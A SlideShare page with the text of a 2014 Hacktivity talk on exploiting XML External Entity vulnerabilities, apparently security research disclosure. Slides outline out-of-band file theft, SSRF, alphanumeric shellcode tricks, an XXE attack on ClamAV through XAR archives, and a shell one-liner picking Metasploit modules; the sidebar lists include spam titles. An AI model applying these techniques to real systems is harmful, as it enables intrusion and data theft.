SlideShare ist ein Scribd-Unternehmen logo

eXploitable Markup Language

Als PPTX, PDF herunterladen
S
sghctoma

The slide deck from our Hacktivity 2014 presentation about exploiting XML External Entity vulnerabilities.

Software
1 von 59
<?xml version=“1.0”?> <DOCTYPE presentation [ <!ENTITY HacktivityLogo SYSTEM “http://hacktivity.com/logo.png”> ]> <presentation> <logos>&HacktivityLogo; </logos> <title> eXploitable Markup Language </title> <speakers> <speaker Name=“Rajtmár Ákos”> <email>akos.rajtmar@praudit.hu</email> </speaker> <speaker Name=“Szakály Tamás”> <email>tamas.szakaly@praudit.hu</email> <twitter>@sghctoma</twitter> </speaker> </speakers> </presentaion>
Possible Hacktivity topics How secure are today’s games? Possible vulns in the EventLog subsystem of recent Windows systems. The security of smart houses.
Well known XML attacks XSLT-related XInclude attacks Entity-based attacks • Billion laughs • XXE Everybody should read “XML Schema, DTD, and Entity Attacks” by VSR
Lots of XML-related web application attacks. But the web is not the whole world. (not yet, anyway :) ) Won’t show any new XML vulnerabilities. DON’Ts
DOs Show exciting ways to exploit Deal with the client side Deal with XML-derivatives, and files with embedded XML parts There are tons of these. Often people don’t even realize they are dealing with XML Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
XML entities What are “entities” in XML-world? OK, what are “external entities”? http://www.w3.org/TR/2006/REC-xml11-20060816/#sec-entity-decl
XXE Intro Most basic XXE: include resources App has to display something from the XML
Interesting protocol handlers jar:// extract file from given .jar file:// directory list • php:// with filters (base64 encode a file)
Special type of entity Using % instead of & More flexible Declaration of external DTD Can not be used in XML body XML syntax is not a must DTD conformity Parameter entities
Non XML conform content combine.dtd: <![CDATA[ ]]>
Sending local file content External parameter entity Different protocol handlers FTP, HTTP, FILE Differences in implementation Out-of-Bounds
XXE meets inter-protocol exploitation Requirements Encapsulation Error tolerance Main difficulty: limited character set Let’s check some XML parsers’ badchars Internet Explorer • only ASCII • URL-encodes some char (e.g. space -> %20) • Cuts newlines Visual Studio • URL-encodes every non alphanumeric chars
Trigger BoF via XXE http://exploit-db.com/exploits/31789
Alphanum shellcode Restricted to alphanumeric characters UTF-8 too!! Metasploit Framework Encoders: x86/alpha_mixed, x86/alpha_upper Useful options: BufferRegister, AllowWin32SEH
The payload
qB8w Need “jmp esp” with an ASCII-only address 0x77384271 in big endian is qB8w
Installed Pidgin Jabber configured accounts.xml Request external DTD Generating mailer payload Sending malicious content Authenticated as user Inter protocol SMTPloitation
Garmin Training Center + Not bothering with n - Yet not able to evaluate &variables; Possible implementation issue Visual Studio 2012 + Ability to evaluate &variables; - A great fan of URL encoding Permanent fail?
Slight possibility of using Garmin I believe I saw it working Finding another n application Visual Studio can be „controlled” Sending multiple files Delivering more attacks Not at all
XXE the AV! Original idea: .docx vs. virus scanners Grepped ClamAV’s source for “xml” It uses libxml2 to open XAR archives basically an archive format with compressed XML metadata What other AV’s know this format?
AVG Ad-Aware Avast Avira BitDefender DrWeb ESET-NOD32 Emsisoft F-Secure Gdata Kaspersky NANO-Antivirus Qihoo-360 nProtect MicroWorld-eScan EICAR string: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* XARd it, and sent to VirusTotal Besides ClamAV, these can deal with XAR:
There Can Be Only One AVs use XML parsers without knowledge of DTD Except ClamAV • Only recent versions >= 0.98.1 So let’s hack ClamAV!
XAR format
XAR hexdump
PoC Python script to create XARs with custom XML Simple XML with HTTP external entity: Scanned it with clamscan...
... and it worked!
&Some haxx0r stuff; libxml2 limitation: very strict URI checking for example, no newlines allowed OOB attacks are very-very limited only files without newlines can be stolen. SSRF is our Super Mushroom only GET request only HTTP payload cannot contain non-ASCII chars
Finding suitable exploits cat ~/msf_http.txt |while read line; do grep -q -E -i "443|post|ssl" $line; if[[ $? -ne 0 ]]; then echo $line; fi; done > ~/msf_http_nossl_nopost.txt
linux/http/esva_exec linux/http/dreambox_openpli_shell linux/http/fritzbox_echo_exec linux/http/symantec_web_gateway_lfi linux/http/symantec_web_gateway_pbcontrol linux/http/ddwrt_cgibin_exec multi/http/struts_code_exec multi/http/vtiger_install_rce multi/http/v0pcr3w_exec multi/http/snortreport_exec multi/http/spree_search_exec multi/http/phptax_exec multi/http/gitorious_graph multi/http/familycms_less_exec multi/http/gestioip_exec multi/http/freenas_exec_raw multi/http/ajaxplorer_checkinstall_exec multi/http/spree_searchlogic_exec multi/http/oracle_reports_rce multi/http/mobilecartly_upload_exec unix/http/freepbx_callmenum unix/webapp/cacti_graphimage_exec unix/webapp/awstats_configdir_exec unix/webapp/barracuda_img_exec unix/webapp/invision_pboard_unserialize_exec unix/webapp/basilic_diff_exec unix/webapp/awstats_migrate_exec unix/webapp/google_proxystylesheet_exec unix/webapp/base_qry_common unix/webapp/tikiwiki_graph_formula_exec unix/webapp/mambo_cache_lite unix/webapp/awstatstotals_multisort unix/webapp/openview_connectednodes_exec unix/webapp/php_charts_exec unix/webapp/php_vbulletin_template unix/webapp/freepbx_config_exec unix/webapp/twiki_search unix/webapp/twiki_history unix/webapp/mitel_awc_exec unix/webapp/instantcms_exec unix/webapp/redmine_scm_exec windows/http/sap_configservlet_exec_noauth
Our choice for the demo unix/webapp/freepbx_config_exec
Further research Games that use XML for game saves, network communication • Skyrim • Flight Gear XML metadata • rdf Binary XML parsers • Cwxml • OpenEXI • Exifficient • AgileDelta • Window EventLog format (since Vista) Network Configuration Protocol (NETCONF) XML databases • IBM DB2 • Oracle • MSSQL
THX

Empfohlen

Persistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionPersistant Cookies and LDAP Injection
Persistant Cookies and LDAP Injection
MaulikLakhani
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
OWASP Delhi
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens
OWASP
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
Madhu Akula
 
What the Struts?
What the Struts?What the Struts?
What the Struts?
Joe Kutner
 
Security Features in MongoDB 2.4
Security Features in MongoDB 2.4Security Features in MongoDB 2.4
Security Features in MongoDB 2.4
MongoDB
 
MongoDB Security Introduction - Presentation
MongoDB Security Introduction - PresentationMongoDB Security Introduction - Presentation
MongoDB Security Introduction - Presentation
Habilelabs
 

Empfohlen

Persistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionPersistant Cookies and LDAP Injection
Persistant Cookies and LDAP Injection
MaulikLakhani
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
OWASP Delhi
 
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural netBlueHat v18 || Malicious user profiling using a deep neural net
BlueHat v18 || Malicious user profiling using a deep neural net
BlueHat Security Conference
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens
OWASP
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
Madhu Akula
 
What the Struts?
What the Struts?What the Struts?
What the Struts?
Joe Kutner
 
Security Features in MongoDB 2.4
Security Features in MongoDB 2.4Security Features in MongoDB 2.4
Security Features in MongoDB 2.4
MongoDB
 
MongoDB Security Introduction - Presentation
MongoDB Security Introduction - PresentationMongoDB Security Introduction - Presentation
MongoDB Security Introduction - Presentation
Habilelabs
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
drewz lin
 
Webinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDBWebinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDB
MongoDB
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
SecuRing
 
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
Daniel Bryant
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
NotSoSecure Global Services
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shell
Madhu Akula
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Scratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit MaheshwariScratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit Maheshwari
OWASP Delhi
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Serverless security: attack & defense
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
SecuRing
 
Mining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudMining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the Cloud
CloudVillage
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersPractical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for Developers
Gökhan Şengün
 
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
PROIDEA
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
snyff
 
Hardening cassandra for compliance or paranoia
Hardening cassandra for compliance or paranoiaHardening cassandra for compliance or paranoia
Hardening cassandra for compliance or paranoia
zznate
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
Roberto Suggi Liverani
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
Sunny Neo
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
Angelo Dell'Aera
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
Stephan Chenette
 

Weitere ähnliche Inhalte

Was ist angesagt?

Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
drewz lin
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
Daniel Bryant
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula
 
Mining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudMining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the Cloud
CloudVillage
 
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
PROIDEA
 

Was ist angesagt? (20)

Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
 
Webinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDBWebinar: Securing your data - Mitigating the risks with MongoDB
Webinar: Securing your data - Mitigating the risks with MongoDB
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
 
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"CodeOne SF 2018 "Are you deploying and operating with security in mind?"
CodeOne SF 2018 "Are you deploying and operating with security in mind?"
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shell
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Scratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit MaheshwariScratching Your Brain into Dark Web by Arpit Maheshwari
Scratching Your Brain into Dark Web by Arpit Maheshwari
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
Serverless security: attack & defense
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
 
Mining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the CloudMining Malevolence: Cryptominers in the Cloud
Mining Malevolence: Cryptominers in the Cloud
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Practical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for DevelopersPractical Cryptography and Security Concepts for Developers
Practical Cryptography and Security Concepts for Developers
 
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
JDD 2016 - Michał Balinski, Oleksandr Goldobin - Practical Non Blocking Micro...
 
JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
 
Hardening cassandra for compliance or paranoia
Hardening cassandra for compliance or paranoiaHardening cassandra for compliance or paranoia
Hardening cassandra for compliance or paranoia
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Attacker's Perspective of Active Directory
Attacker's Perspective of Active DirectoryAttacker's Perspective of Active Directory
Attacker's Perspective of Active Directory
 

Ähnlich wie eXploitable Markup Language

Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
Stephan Chenette
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
 
Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS Office
Kaspersky
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Serverless security: defence against the dark arts
Serverless security: defence against the dark artsServerless security: defence against the dark arts
Serverless security: defence against the dark arts
Yan Cui
 

Ähnlich wie eXploitable Markup Language (20)

Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS Office
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Threat Modeling - Writing Secure Code
Threat Modeling - Writing Secure CodeThreat Modeling - Writing Secure Code
Threat Modeling - Writing Secure Code
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Serverless security: defence against the dark arts
Serverless security: defence against the dark artsServerless security: defence against the dark arts
Serverless security: defence against the dark arts
 
Bsides Tampa Blue Team’s tool dump.
Bsides Tampa Blue Team’s tool dump.Bsides Tampa Blue Team’s tool dump.
Bsides Tampa Blue Team’s tool dump.
 

Kürzlich hochgeladen

+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Alberto González Trastoy
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
VishalKumarJha10
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Steffen Staab
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
OnePlan Solutions
 

Kürzlich hochgeladen (20)

A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 

eXploitable Markup Language

Hinweis der Redaktion

  1. Java-s demo: direktori listazas bemutatasa PHP-s webes demo: forraskod ellopasa base64 enkodolt formaban